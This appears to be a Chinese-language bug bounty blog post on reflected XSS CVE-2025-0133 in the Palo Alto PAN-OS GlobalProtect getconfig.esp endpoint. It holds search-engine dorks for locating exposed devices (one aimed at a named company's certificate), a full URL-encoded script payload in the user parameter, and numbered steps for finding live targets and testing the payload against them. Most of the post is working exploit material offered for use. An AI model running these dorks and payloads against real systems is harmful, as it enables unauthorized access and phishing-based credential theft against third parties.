PAN-OS反射型跨站脚本漏洞(CVE-2025-0133)挖掘与利用详解

本文详细分析了Palo Alto Networks PAN-OS软件中存在的反射型XSS漏洞(CVE-2025-0133),包含漏洞原理、搜索引擎探测方法、利用POC以及完整的攻击链演示,涉及Shodan/FoFA查询语法和恶意载荷构造技术。

Bug Bounty CVE-2025–0133 PAN-OS: 反射型跨站脚本(XSS)“最常被利用漏洞”

Palo Alto Networks PAN-OS软件的GlobalProtect网关和门户功能中存在反射型跨站脚本(XSS)漏洞,当认证的Captive Portal用户点击特制链接时,可在其浏览器上下文中执行恶意JavaScript。主要风险是可能导致凭证窃取的钓鱼攻击——特别是在启用无客户端VPN的情况下。

🔍 在不同搜索引擎中查找该漏洞的方法

Shodan查询:

1
2
3
http.favicon.hash:-631559155
os:"PAN-OS" 
ssl.cert.subject.CN:"redbull.com"

FOFA查询:

1
app="paloalto-GlobalProtect"

ZoomEye查询:

1
app:"Palo Alto Networks firewall httpd"

😈 漏洞利用POC

XSS载荷:

1
ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1–10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22Hex00%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=(empty_domain)&computer=computer

🚩 攻击步骤

步骤1: 使用Shodan或其他搜索引擎通过上述查询语句查找目标URL

步骤2: 打开其中一个URL,查找端点 /global-protect/login.esp/

步骤3: 使用XSS载荷进行测试:

1
/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1–10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22mitsec%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=(empty_domain)&computer=computer
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计